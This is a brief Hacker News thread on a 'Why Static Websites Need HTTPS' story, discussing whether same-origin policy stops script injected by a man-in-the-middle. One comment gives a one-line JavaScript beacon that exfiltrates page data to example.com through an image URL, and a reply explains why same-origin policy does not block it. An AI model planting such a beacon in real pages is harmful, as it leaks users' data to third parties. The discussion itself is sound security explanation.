How does same-origin policy (on a MITM'd website) prevents this? (new Image()).s... | Hacker News

Hacker News new | past | comments | ask | show | jobs | submit

login

slig on Aug 28, 2018 | parent | context | favorite | on: Why Static Websites Need HTTPS

How does same-origin policy (on a MITM'd website) prevents this?

    (new Image()).src = 'https://example.com/data.php?payload=' + JSON.stringify(data);

bn-usd-mistake on Aug 28, 2018 | [–]

It doesn't because Same-origin protects data on example.com, not on the embedding page (in your example). It is not a security measure that aims to prevent the issue mentioned by the grand parent post

austincheney on Aug 28, 2018 | [–]

Here is how: https://news.ycombinator.com/edit?id=17861667

Consider applying for YC's Fall 2025 batch! Applications are open till Aug 4
Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact